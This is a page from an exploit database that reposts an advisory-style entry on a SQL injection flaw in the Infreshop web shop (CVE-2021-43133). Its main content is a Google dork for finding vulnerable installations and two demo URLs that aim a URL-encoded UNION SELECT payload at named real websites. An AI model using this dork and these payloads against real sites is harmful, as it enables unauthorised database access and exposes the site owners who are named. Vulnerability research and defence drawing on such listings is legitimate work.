Advertisement






Infreshop - Sql Injection Vulnerability

CVE Category Price Severity
CVE-2021-43133 CWE-89 $5,000 High
Author Risk Exploitation Type Date
Unknown High Remote 2022-05-01
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022050002

Below is a copy:

Infreshop - Sql Injection Vulnerability
*********************************************************
#Exploit Title: Infreshop - Sql Injection Vulnerability
#Date: 2022-04-29
#Exploit Author: Behrouz Mansoori
#Google Dork: "Powered by Infreshop"
#Category:webapps
#Tested On: windows 10, Firefox
 
 
Proof of Concept:
Search google Dork: "Powered by Infreshop"

### Demo :

https://www.aputea.it/it/shop.php?id=-6' %75nion %73elect version()--+

https://user.dalmenu.it/it/shop.php?id=-31' %75nion %73elect version()--+

********************************************************* 
#Discovered by: Behrouz mansoori
#Instagram: Behrouz_mansoori
#Email: [email protected]
*********************************************************

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum